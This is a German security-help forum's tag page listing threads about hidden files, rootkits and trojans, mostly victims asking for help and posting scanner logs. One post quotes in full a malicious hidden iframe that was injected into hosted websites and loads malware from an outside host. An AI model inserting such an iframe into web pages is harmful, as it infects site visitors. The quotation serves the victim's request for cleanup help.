Zurück   Trojaner-Board > Themen

Alles zum Thema: Hidden

  Letzter Beitrag Antworten Hits Forum
Mehrere Viren! 8Backdoor usw.)
Hidden - Hallo ich hab meinen Pc mal mit Avari AntiVir prüfen lassen fand ziemlich viel so und jetzt habe ich Malwarebyts & OTL & HiJackThis durchlaufen lassen hier die Ergebnisse bitte helft mir wie ich sie weg bekommen: malewarebyts: Malwarebytes' Anti-Malware 1.46 www.malwarebytes.org ...
Plagegeister aller Art und deren Bekämpfung
Rootkit in Kaspersky Programmverzeichnis?
Hidden - Hallo, auf einem Vista Rechner mit Kaspersky Internet Security habe ich mal zusätzlich housecall.trendmicro.com/de durchlaufen lassen. Der hat in einem Unterverzeichnis des Kaspersky Programmverzeichnisses eine Rootkit-Datei (Bedrohung: Hidden File) gefunden: kjim1271498447.kdl Angeblich...
Plagegeister aller Art und deren Bekämpfung
Rootkit jpvuntnn
Hidden - Hallo Zusammen, ich habe gerade GMER nach Anleitung gestartet und er hat gleich was gefunden. Hier das LOG: GMER 1.0.15.14966 - http://www.gmer.net Rootkit scan 2010-02-03 11:08:56 Windows 5.1.2600 Service Pack 2
Antiviren-, Firewall- und andere Schutzprogramme
1und1-Server infiziert gehostete Websites
Hidden - Mehrere meiner bei 1und1 gehosteten Websites wurden infiziert - ein iFrame wurde eingeschleust, der folgendermaßen aussieht: <iframe src="http://xd4.ru:8080/ts/in.cgi?pepsi123" width=125 height=125 style="visibility: hidden"></iframe> Wird eine infizierte Seite aufgerufen, werden Schadprogramme...
Plagegeister aller Art und deren Bekämpfung
TR/Crypt.ZPACK.Gen die Xte..
Hidden - Hallo! Ich glaube, ich habe dasselbe Problem wie Kadda, jedenfalls denselben Trojaner. Ich habe die drei Schritte von Punkt zwei befolgt und hier ist mein Report: Malwarebytes' Anti-Malware 1.40 Datenbank Version: 2551 Windows 5.1.2600 Service Pack 2 21.08.2009 19:57:09...
Plagegeister aller Art und deren Bekämpfung
Hidden Drivers...
Hidden - Hallo.Habe heute ein Scan mit AVG Anti-Rootkit gemacht und das Prog hat die zwei Sachen gefunden: C:\WINDOWS\System32\Drivers\af09w3ng.SYS,Hidden driver file C:\WINDOWS\System32\Drivers\aa1flvv7.SYS,Hidden driver file Das Problem ist ich weiß nicht wofür die Files gut sind und ich kann sie...
Plagegeister aller Art und deren Bekämpfung
explorerstartpage Problem ...
Hidden - Hallo HighJackThis, nachdem auch ich auf meinem Rechner dieses explorerstartpage Problem hatte, habe ich die diversen Schritte mit MWB durchgeführt und poste nun den report mit der Bitte um Prüfung. Danke für die vielen Tips und die kommende Antwort. Gruß Driver1968 Malwarebytes' Anti-Malware...
Log-Analyse und Auswertung
Trojaner ?
Hidden - Hallo zusammen, ich habe ein Problem. Mein Kaspersky Security Suite CBE hat ein Hidden object Prozess (PID:3264): gemeldet. Könnt Ihr mir schreiben ob das Ding gefährlich is und wie ich es wieder los werde ? Vielen Dank für Eure Hilfe Andi
Plagegeister aller Art und deren Bekämpfung
Mehrere Trojaner Helft mir bitte
Hidden - hi , ich habe mehrere trojaner auf dem rechner. Hijack läuft nicht ,daher poste ich Malwareantimalware bites. hier der Log: Malwarebytes' Anti-Malware 1.33 Datenbank Version: 1668 Windows 5.1.2600 Service Pack 3 31.01.2009 23:12:45
Log-Analyse und Auswertung
rootkit oder nichts ernstes?
Hidden - habe mit gmer hier mal ein scan gemacht. unter services ist eine versteckte datei. jetzt wollte ich mal fragen ob das was ernstes ist? sie lässt sich nicht löschen über gmer.hoffe ihr könnt mir helfen und ich muss nicht(was ich fast befürchte) neu formatieren. das ist die besagte datei: ...
Mülltonne
trojan-dropper oder ähnliches
Hidden - hi leute, ich habe das antivirus kasperksy 7.0 und ich habe mir etwas gedownloaded was anscheind eine hidden install durchgeführt hat kasperksy hat mich darauf hingewiesen das ich das blockieren sollte(empholen). ich hatte nicht wirklich viel ahnung und wusste nicht wirklich was das war also habe...
Plagegeister aller Art und deren Bekämpfung
Beagle Virus
Hidden - Hallo zusammen, bin Neu hier und gleich ein Problem. :heulen: Also fast keine Programme gehen mehr, keine Win32-Anwendung.. Abgesichert = Absturz Wiederherstellung = Fehler Meinen Kaspe. Antivirus hat es einfach rausgeworfen.. Hier der Log:
Plagegeister aller Art und deren Bekämpfung
silentbanker->McAfee->hidden registry keys / values
Hidden - hallo! nachdem ich dem silentbanker-rootkit-verschnitt mit wasweißichwas versucht habe den gar auszumachen habe ich mcafee benutzt, was mir 3 verdächtige hidden files und processes meldete, die ich umbenannt hatte. bevor ich dies tat hat antivir nach jedem neustart 3-9 mal den alarm:...
Plagegeister aller Art und deren Bekämpfung
hldrrr.exe gefunden, was nun?
Hidden - mein mitbewohner hat das selbe problem wie ich es hatte... nur etwas kleiner wie mir scheint... kann man bei ihm noch was machen... oder hilft da nur eine neuinstallation? 07/03/08 09:20:44 : BlackLight Engine 1.0.70 initialized 07/03/08 09:20:44 : OS: 5.1 build 2600 (Service Pack 3,...
Mülltonne
Protected Storage System Rootkit
Hidden - Hallo zusammen, ich habe mein System mit McAfee Rootkit Detective gescannt und dabei sind 10 Hidden registry keys gefunden worden. Danach mit Sophos Anti-Rootkit - keine gefunden. Auch Kaspersky Anti-Virus, das installiert ist, gibt keine Meldung. McAfee(R) Rootkit Detective 1.1 scan report...
Log-Analyse und Auswertung
Mein Rechner startet immer Neu
Hidden - Guten Morgen, seit gestern fährt mein Rechner nicht mehr runter sondern startet immer wieder neu. Nun zeigt mir Kaspersky folgende Meldung: gefunden: potentiell gefährliche Software Hidden data sending Prozess: C:\Programme\Internet Explorer\IEXPLORE.EXE Kann es daran liegen? Über eine...
Plagegeister aller Art und deren Bekämpfung
McAfee Rootkit Detective 1.1 findet verstekte Einträge
Hidden - Hallo erst mal, habe meinen Computer durch McAfee Rootkit Detective scannen lassen. Leider lieferte das Programm folgende Ergebnisse unter den "View hidden registry keys/values" HKLM\SOFTWARE\Classes\.bpi HKLM\SOFTWARE\Classes\.ids HKLM\SOFTWARE\Classes\blue.Shortcut\shell\open\command...
Plagegeister aller Art und deren Bekämpfung
Merkwürdige "hidden value" bei Sophos Antirootkit
Hidden - Hallo, ich bekommen seit einiger Zeit mit der neuesten Versin von Sophos Antirootkit Free folgende Meldung: --------------------------- Area: Windows registry Description: Hidden registry value Location:...
Plagegeister aller Art und deren Bekämpfung
Was ist das?
Hidden - Hallo Bin neu hier und habe euch durchzufall gefunden..ich hoffe bin hier richtig mit dem was ich poste :) Also es geht um Folgendes...Ich habe ein Board das wbb2.3.6 und seit ei igen tagen stimmt da was nicht...in der index.php schleicht sich immer dieses ein <iframe...
Plagegeister aller Art und deren Bekämpfung
brauche hilfe!
Hidden - hallo, ich glaube mein cumpter ist ziemlich verspyt!Wenn ich zum Beispiel bei google etwas suchen möchte und dann auf den link klicke leitet er mich auf eine andere seite um oder neuerdings:wenn ich windows starte zeigt er mir irgendwas an mit einer datei testtestt.exe und wenn ich herunterfahre...
Log-Analyse und Auswertung
WINTEMS.exe
Hidden - Hallo, ich habe mir einen Trojaner eingefangen auf meinem laptop. Ich habe schon rausgefunden das die Datei WINTEMS.exe sich um einen Trojaner handelt. Aber leider bekomme ich den nicht weg. Und egal was ich installiere, er löscht mir sofort die .exe Dateien weg. Ich kann keinen Spybot...
Plagegeister aller Art und deren Bekämpfung
Rootkit
Hidden - Hallo zusammen! Ich habe mit dem rootkitrevealer etwas verdächtiges (hidden from windows api) in der registry gefunden. HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGÿCY_POLICYAGENT ich kann nicht darauf zugreifen, auch nicht im abgesicherten modus. was ich komisch finde dass der...
Log-Analyse und Auswertung
Desktop Hintergrund verschwunden
Hidden - Ich habe folgendes Problem: Wenn ich meinen PC starte sehe ich für ca. 5 Sekunden meinen Desktophintergrund. Dannach erscheint dieses weiße Bild, dass meinen geliebten Desktophintergrund verdeckt, welches man auf dem Screenshot sehen kann inkl. der Eigenschaften des weißen Bildes. ...
Alles rund um Windows
Wo ist meine SP2-tcptest.exe ?????
Hidden - Hallo, ich sitze schon seit Tagen am rechner und versuche verzweifelt das SP2 zu installieren. Durch die Googlesuche kam ich zu euch und habe meinen PC auch mal mit dem F-Secure blacklight gescannt......komisch, der findet eine tcptest.exe. Warum? Hat das irgendwas mit dem Abbruch der...
Log-Analyse und Auswertung
Unsichtbare Datei / RegistryEntry Löschen
Hidden - Bei dem Versuch, einigen blöden PopUps auf die Spur zu kommen, habe ich mittels des Security-TaskManagers 2 Prozesse entdeckt, die bei jedem Start eines InternetExplorers (egal welcher Explorer) mit gestartet werden. Leider sind die Dateien auf die die Prozesse verwiesen nicht sichtbar und auch...
Plagegeister aller Art und deren Bekämpfung
Archiv
Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.